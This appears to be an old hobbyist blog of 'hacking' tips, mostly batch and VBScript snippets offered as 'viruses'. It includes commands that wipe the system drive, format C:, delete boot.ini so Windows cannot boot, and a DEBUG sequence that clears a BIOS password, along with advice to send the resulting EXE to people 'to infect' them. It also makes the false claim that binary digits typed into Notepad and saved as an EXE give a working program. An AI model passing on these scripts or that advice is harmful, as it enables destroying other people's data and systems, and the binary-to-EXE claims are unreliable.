JustWedding Wedding Magic Hacking Software & Game Facebook
-->

Wednesday, March 30, 2011

Thursday, January 13, 2011

simple virus in .bat




use these scripts on your own responsibility..

1.This Virus Deletes All The Content Of A Drive…

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code As Anything.bat

2.The Most Simple Virus To Crush The Window

@Echo off
Del C: *.* y

Save It As Anything.bat

3.The below Code Will Just Restart Ur PC

@echo off shutdown -r -f -t 00

save as anyname.bat

How to remove Friends on Facebook ?



Facebook is number 1 social-networking website in the world.You can make connect with new friend around the world on web.But when you are not happy with your any friend then you can remove that friend.Here is method how to remove friend from facebook

1.Login to your facebook account

2.Go to home , click on friends tab at the top of home page

3.Then click on all connections at top of left side

4.There you will get list of all your facebook friends

5.To remove any friend click on the cross sign at right side of their name

You will get an option to delete that friend or not.Then your facebook friend will be remove from your friend list.Enjoy removing facebook friend with whom you are not happy..

How to Shutdown Someones Computer


Shutdown someones computer using messenger remotely??

This is a very simple trick by which you can shutdown someone or your friend computer.Follow these simple steps to shutdown someones computer

1. Right click on desktop, and then go New, then Shortcut.

2. Then in the “type location of the item” type or copy this and paste at the location:

%windir%system32shutdown.exe -s -t 120 -c “This is a virus”

This is just a simple command to shutdown computer..

3.Click to create your shortcut.

4.Done

Friday, November 12, 2010

CRACK BIOS PASSWORD

here are a lot ways to Crack the BIOS password. This is one of them but I would say that this one is more effective than the rest because the rest of the ways does not Guarantee you that it will Crack the BIOS password while in this case the Cracking is Guaranteed since in this we will remove the functionality of password protection of the BIOS.

Follow the steps below:

1) Boot up windows.
2) go to dos-prompt or go to command prompt directly from the windows start up menu.

3) type the command at the prompt: “debug” (without quotes ninja.gif )
4) type the following lines now exactly as given…….
o 70 10
o 71 20
quit
exit

4) exit from the dos prompt and restart the machine
password protection gone!!!!!!!

PS: I tested this in Award Bios……..
There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine………..

I have not found any other trouble if the codes are used.
To be on safe side, just back up your data……….
The use of this code is entirely at ur risk……….
It worked fine for me……….

Batch&Binary programs for formatting

Do not try it on your PC. Don’t mess around this is for educational purpose only


1.
go to notepad and type the following:
@Echo off
2. Del C:\ *.*|y save it as Dell.bat

want worse then type the following:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file

next,these are programs to cause system crash:

Step 1. Copy The Following In Notepad Exactly as it says[format HDD]

01001011000111110010010101010101010000011111100000

Step 2. Save As An EXE Any Name Will Do
Step 3. Send the EXE to People And Infect

try these also

format c:\ /Q/X — this will format your drive c:\

01100110011011110111001001101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini — this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000
101111010100110010111101010001
00100000011000110011101001011100011000100110111101
101111011101000010111001101001
0110111001101001

Try to figure out yourself rest
can’t spoonfeed
Its working.

This is a VB Script to eject CD tray periodically like a joking virus

Type this code in notepad and save as all-files as "anyname.vbs". ==CODE below==do
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
If colCDROMs.Count >= 1 Then
For i = 0 To colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
loop And then open the VBS file see what will happen to your CD Drive ?